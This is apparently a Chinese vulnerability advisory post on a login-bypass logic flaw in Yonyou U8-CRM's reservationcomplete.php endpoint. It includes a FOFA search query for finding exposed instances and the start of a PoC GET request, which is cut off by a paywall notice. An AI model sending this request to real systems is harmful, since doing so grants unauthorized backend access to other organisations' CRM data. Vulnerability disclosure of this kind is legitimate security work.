本文介绍了用友U8-CRM的客户关系管理系统的漏洞情况,主要涉及reservationcomplete.php接口的逻辑漏洞,攻击者可借此绕过登录。建议用户及时联系厂商更新至最新安全版本以保障系统安全。
产品简介
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。
漏洞概述
CRM系统reservationcomplete.php接口处存在逻辑漏洞,攻击者通过漏洞可以进入系统后台
指纹识别
fofa:
app="用友U8CRM"
漏洞利用
poc:
GET /background/reservationcomplete.php?ID=1 HTTP/1.1
Host:
User-Agent
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
